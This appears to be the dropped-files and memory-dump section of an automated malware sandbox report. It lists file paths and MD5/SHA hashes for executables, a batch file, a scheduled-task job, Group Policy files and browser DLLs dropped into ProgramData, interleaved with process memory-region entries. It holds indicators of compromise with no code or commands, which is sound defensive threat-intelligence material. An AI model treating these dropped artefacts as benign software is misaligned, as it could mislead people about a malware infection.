| SHA1 | 034bd6bbd7123627ca202b6b35b9018261fc03d5 |
| SHA256 | c8cbcc07e14d8e019e5927126fb5ff30ec1d77f9f351d5738b73c228f02eaede |
| SHA512 | d0f559744068666b3d3cfe9db4ea00ee40a5cc9ab70dfa095c3cbb19dd2fff13746db1bec814ce4faff6df6ebaaa39af62e7e55dd43bea5be6ef356a9c127888 |
memory/3308-159-0x0000000004190000-0x0000000004590000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\u264.0.exe
| MD5 | 77d761b9bf240b7dc67c06208272e05e |
| SHA1 | fb5682433d43c10333a5d368047ba61ab7f4d14f |
| SHA256 | 492f3d1cde4e25da81e94ceeb7cb8469740db841bf7158ad3ebed11ef73277f0 |
| SHA512 | 7314da44c30e98d647050e1db32030fb9dbdb18c1a899cccaec0337b4ecda5a53fb4e63e61780a6cf4059066bd5e55c9e426efa525ff79eed8d5a01f8488f76c |
memory/3308-162-0x0000000004190000-0x0000000004590000-memory.dmp
memory/2812-161-0x0000000000400000-0x0000000000B0E000-memory.dmp
memory/2812-165-0x0000000000C30000-0x0000000000D30000-memory.dmp
memory/3308-166-0x00007FFECD4A0000-0x00007FFECD6A9000-memory.dmp
memory/908-174-0x0000000000CC0000-0x0000000000CC9000-memory.dmp
memory/4060-181-0x0000000000400000-0x0000000000ED4000-memory.dmp
C:\Users\Admin\Pictures\Zs7JzICiQb8rN1LWDoq1oFuC.exe
| MD5 | fd0048f4e2d30786133d001b54f4a72f |
| SHA1 | a7135f8891dc1e09d66bd4fc8e06eca519dcdf49 |
| SHA256 | c79aae6d95db14bf3827cb783cd7bf4354f1971af2e55d94a83b752080f9aae0 |
| SHA512 | 58dfbcd6eeead17b91b27b65588737a1c61485a25a5a730cab60defc3a629b4dd8d45c635b2c21376a1145122bc95d500aab5628865d5af3d563254aa7cf5bef |
memory/2780-204-0x00007FF7658D0000-0x00007FF766331000-memory.dmp
memory/2780-206-0x00007FF7658D0000-0x00007FF766331000-memory.dmp
memory/2780-217-0x00007FF7658D0000-0x00007FF766331000-memory.dmp
memory/872-213-0x0000000000400000-0x0000000000ED4000-memory.dmp
memory/2780-225-0x00007FF7658D0000-0x00007FF766331000-memory.dmp
memory/2780-226-0x00007FF7658D0000-0x00007FF766331000-memory.dmp
memory/3308-227-0x0000000004190000-0x0000000004590000-memory.dmp
memory/2780-228-0x00007FF7658D0000-0x00007FF766331000-memory.dmp
memory/2780-229-0x00007FF7658D0000-0x00007FF766331000-memory.dmp
memory/908-220-0x0000000076290000-0x00000000764E2000-memory.dmp
C:\Windows\System32\GroupPolicy\gpt.ini
| MD5 | 8ef9853d1881c5fe4d681bfb31282a01 |
| SHA1 | a05609065520e4b4e553784c566430ad9736f19f |
| SHA256 | 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2 |
| SHA512 | 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005 |
memory/4640-242-0x0000000000BB0000-0x0000000000CB0000-memory.dmp
memory/908-241-0x0000000002960000-0x0000000002D60000-memory.dmp
C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat
| MD5 | 3e0aaee17d4aecbea4cfd7df4502729e |
| SHA1 | acdd4af0679fd5e5588b27eab07f9970a68f30d9 |
| SHA256 | ac68eadb8eba1eb00c5a68a4360b3aca8e3325a4a0ab3a6df34270c2251e13cb |
| SHA512 | 922cfa86bcdb0280e78f817aaff612df32725ee81705a9f5c2b56161dc34b7b0e24888ccbabadaacecd38703a56d3c210ec9259c24fdf1992b39763d20bcbd60 |
memory/908-211-0x00007FFECD4A0000-0x00007FFECD6A9000-memory.dmp
memory/1860-198-0x0000000000400000-0x0000000000ED4000-memory.dmp
memory/908-197-0x0000000002960000-0x0000000002D60000-memory.dmp
memory/2780-176-0x00007FFECAF50000-0x00007FFECB2C4000-memory.dmp
memory/2780-175-0x00007FFE80000000-0x00007FFE80002000-memory.dmp
memory/2780-173-0x00007FFECC6E0000-0x00007FFECC79D000-memory.dmp
memory/3308-170-0x0000000004190000-0x0000000004590000-memory.dmp
memory/3308-169-0x0000000076290000-0x00000000764E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSD590.tmp\Install.exe
| MD5 | ccdc5c743b6031e977a71cf919c0db7e |
| SHA1 | f9e399475e158c6f2ea8ca2c991ffb37ba89ac30 |
| SHA256 | f08ebffa05fd0fee031986a37356aa91c55735e61e573e2005e705125192c44e |
| SHA512 | f802cf236f75924271cafffd1be7319f2d1eaa26eecabc117a066f61a35c2acbbdcecf8bd93931ed61811b760a92695a4e2c291b5e81104bce1608d62ebee9f0 |
memory/2028-251-0x0000000074410000-0x0000000074BC1000-memory.dmp
memory/908-263-0x0000000002960000-0x0000000002D60000-memory.dmp
memory/2812-260-0x0000000000400000-0x0000000000B0E000-memory.dmp
memory/908-265-0x000000000296F000-0x0000000002D60000-memory.dmp
memory/2780-264-0x00007FF7658D0000-0x00007FF766331000-memory.dmp
memory/908-266-0x00007FFECD4A0000-0x00007FFECD6A9000-memory.dmp
memory/4640-267-0x0000000000400000-0x0000000000AEA000-memory.dmp
memory/4640-270-0x00000000026F0000-0x0000000002717000-memory.dmp
memory/4060-271-0x0000000000400000-0x0000000000ED4000-memory.dmp
memory/1860-272-0x0000000000400000-0x0000000000ED4000-memory.dmp
memory/872-275-0x0000000000400000-0x0000000000ED4000-memory.dmp
memory/2780-279-0x00007FFE80030000-0x00007FFE80031000-memory.dmp
memory/2780-280-0x00007FFECD4A0000-0x00007FFECD6A9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSEF80.tmp\Install.exe
| MD5 | b119ea556def66eaa9f751a650b45af0 |
| SHA1 | daf3fa0325b110183d0a233b4b0d1875f0b49ca8 |
| SHA256 | 53c38771ea9986f418a48d89e4df5e82c84f1e71a4c242fc6e6ae3ba934cf6d4 |
| SHA512 | 08dd919ce39af698051b4f156faa8d155c41cc0de3412ef152dc6e90cbdd5cb50109f57c47555925fd6d18816411b1c510ac642b9576f5f28540be8695ed46c4 |
C:\Users\Admin\AppData\Local\Temp\u264.1.exe
| MD5 | eee5ddcffbed16222cac0a1b4e2e466e |
| SHA1 | 28b40c88b8ea50b0782e2bcbb4cc0f411035f3d5 |
| SHA256 | 2a40e5dccc7526c4982334941c90f95374460e2a816e84e724e98c4d52ae8c54 |
| SHA512 | 8f88901f3ebd425818db09f268df19ccf8a755603f04e9481bcf02b112a84393f8a900ead77f8f971bfa33fd9fa5636b7494aaee864a0fb04e3273911a4216dc |
memory/596-307-0x0000000010000000-0x00000000105E5000-memory.dmp
memory/4640-313-0x0000000061E00000-0x0000000061EF3000-memory.dmp
memory/2808-314-0x0000000000400000-0x0000000000930000-memory.dmp
memory/4264-316-0x0000000010000000-0x00000000105E5000-memory.dmp
memory/2808-318-0x00000000028F0000-0x00000000028F1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Temp\Task.bat
| MD5 | 11bb3db51f701d4e42d3287f71a6a43e |
| SHA1 | 63a4ee82223be6a62d04bdfe40ef8ba91ae49a86 |
| SHA256 | 6be22058abfb22b40a42fb003f86b89e204a83024c03eb82cd53e2a0a047c331 |
| SHA512 | 907ad2c070cc1db89f43459a94d7f48985d939d749c9648b78572a266f0d3fde47813a129e9151dbf4a7d96d36f588172f57c88b8b947b56ed818d7d068abab2 |
memory/2812-343-0x0000000000400000-0x0000000000B0E000-memory.dmp
C:\ProgramData\nss3.dll
| MD5 | 1cc453cdf74f31e4d913ff9c10acdde2 |
| SHA1 | 6e85eae544d6e965f15fa5c39700fa7202f3aafe |
| SHA256 | ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5 |
| SHA512 | dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571 |
C:\ProgramData\mozglue.dll
| MD5 | c8fd9be83bc728cc04beffafc2907fe9 |
| SHA1 | 95ab9f701e0024cedfbd312bcfe4e726744c4f2e |
| SHA256 | ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a |
| SHA512 | fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040 |
C:\Windows\system32\GroupPolicy\gpt.ini
| MD5 | a62ce44a33f1c05fc2d340ea0ca118a4 |
| SHA1 | 1f03eb4716015528f3de7f7674532c1345b2717d |
| SHA256 | 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a |
| SHA512 | 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732 |
memory/2208-404-0x0000000002920000-0x0000000002956000-memory.dmp
memory/4984-405-0x00000000056C0000-0x0000000005CEA000-memory.dmp
memory/4444-406-0x0000000004EE0000-0x0000000004F02000-memory.dmp
memory/4444-408-0x0000000005970000-0x00000000059D6000-memory.dmp
memory/2208-407-0x0000000005800000-0x0000000005866000-memory.dmp
memory/4060-409-0x0000000000400000-0x0000000000ED4000-memory.dmp
memory/2208-412-0x00000000058E0000-0x0000000005C37000-memory.dmp
memory/1860-421-0x0000000000400000-0x0000000000ED4000-memory.dmp
memory/872-430-0x0000000000400000-0x0000000000ED4000-memory.dmp
memory/2780-431-0x00007FF7658D0000-0x00007FF766331000-memory.dmp
memory/4640-440-0x0000000000400000-0x0000000000AEA000-memory.dmp
memory/2808-442-0x0000000000400000-0x0000000000930000-memory.dmp
memory/2208-443-0x0000000074410000-0x0000000074BC1000-memory.dmp
memory/4060-444-0x0000000000400000-0x0000000000ED4000-memory.dmp
memory/2208-450-0x0000000004AF0000-0x0000000004B00000-memory.dmp
memory/4444-454-0x0000000005E00000-0x0000000005E1E000-memory.dmp
memory/2208-455-0x0000000006120000-0x000000000616C000-memory.dmp
memory/4060-461-0x0000000002CD0000-0x00000000030CC000-memory.dmp
memory/4984-462-0x0000000074410000-0x0000000074BC1000-memory.dmp
memory/4984-463-0x0000000005080000-0x0000000005090000-memory.dmp
memory/4984-464-0x0000000005080000-0x0000000005090000-memory.dmp
memory/4444-468-0x0000000074410000-0x0000000074BC1000-memory.dmp
memory/4444-469-0x0000000002A00000-0x0000000002A10000-memory.dmp
memory/2208-470-0x0000000004AF0000-0x0000000004B00000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259131\opera_package
| MD5 | 152a1d1c87a787b3ead0b925d08a807c |
| SHA1 | 506fedcaaaf7e862f9cfff48ca0530b3698ac041 |
| SHA256 | 7cb5e0904867d5f96701fa86d63d856c23ba5abb033f86d80daf67220eb9c6ec |
| SHA512 | cec89df98e3a68c3666a708baa986306299281c937090969639dc48ee99f8e260b38ca839c3ef91c71b42c9ed94b8f6aaed50edae3b5f2c7e0f2661105c1b5ec |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log
| MD5 | 627073ee3ca9676911bee35548eff2b8 |
| SHA1 | 4c4b68c65e2cab9864b51167d710aa29ebdcff2e |
| SHA256 | 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c |
| SHA512 | 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | d0c46cad6c0778401e21910bd6b56b70 |
| SHA1 | 7be418951ea96326aca445b8dfe449b2bfa0dca6 |
| SHA256 | 9600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02 |
| SHA512 | 057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 8726c00fc7329f25787030d9f3a86324 |
| SHA1 | 6dbf8c871182e38fd0d1520f41a78648a159b8ab |
| SHA256 | 403d4d86c07e5591c10a2a23f10b7a28b57875bba1793dac2cd87ba2777742b1 |
| SHA512 | 8ca7439b66681b91761203034a4a53bfd090ac8dadaf19cb741faaa1a704c970dbb85bd6013f4f8a2a0e6c7548eed44fd1091299ede473163c337aca61379cb4 |
C:\Windows\Tasks\bdnnguwcOLBYKAjbbA.job
| MD5 | c1cbd9154e833dcd9b22bb5d52ba865a |
| SHA1 | 0171f2a73a2ca07d7978aa827c284b423f5b1363 |
| SHA256 | 5333685bbf1e775eccdbf2c71e97eff617ae98d1bf76bb8a1bf70ed1555d71dc |
| SHA512 | 903b7ad717c782436bca250ebebd8a7c501e163fb1809d34f6ac288fc6295f4d3a6cbbf76e408a5860a6363a626d860a6031c7bcc100fd8f535365613f9bc718 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259131\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
| MD5 | 20d293b9bf23403179ca48086ba88867 |
| SHA1 | dedf311108f607a387d486d812514a2defbd1b9e |
| SHA256 | fd996b95ae46014edfd630bfc2bf8bc9e626adf883a1da017a8c3973b68ec348 |
| SHA512 | 5d575c6f0d914583f9bb54f7b884caf9182f26f850da9bdd962f4ed5ed7258316a46fafaf3828dccb6916baaadb681fe1d175a3f4ed59f56066dc7e32b66f7b6 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259131\assistant\assistant_installer.exe
| MD5 | b3f05009b53af6435e86cfd939717e82 |
| SHA1 | 770877e7c5f03e8d684984fe430bdfcc2cf41b26 |
| SHA256 | 3ea8d40fcede1fc03e5603246d75d13e8d44d7229d4c390c39a55534053027f7 |
| SHA512 | d2dee80aaa79b19f1eb1db85079a05f621780e06bfea9e838b62d757ba29399f9090ec7c6ff553377c9b712f3ba8dd812cdff39f3e28829928e86746a8ac6b27 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259131\assistant\dbghelp.dll
| MD5 | 925ea07f594d3fce3f73ede370d92ef7 |
| SHA1 | f67ea921368c288a9d3728158c3f80213d89d7c2 |
| SHA256 | 6d02ebd4ec9a6093f21cd8ccefb9445fa0ab7b1f69ac868a5cfc5d28ed8d2de9 |
| SHA512 | a809851da820d9fdd8fb860a8f549311dcc2579df2c6f6fba74f50d5d8bf94baa834b09fb5476ac248f18d1deb6b47d4fdd6d658889d5d45ca8774a9264483d2 |
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281259131\assistant\dbgcore.dll
| MD5 | 8b6f64e5d3a608b434079e50a1277913 |
| SHA1 | 03f431fabf1c99a48b449099455c1575893d9f32 |
| SHA256 | 926d444ffca166e006920412677c4ed2ef159cf0efc0578cb45b824f428f5eb2 |
| SHA512 | c9aeac62ece564ac64a894300fb9d41d13f22951ead73421854c23c506760d984dff0af92bef2d80f3a66e782f0075832e9c24a50ae6110d27a25c14e065b41c |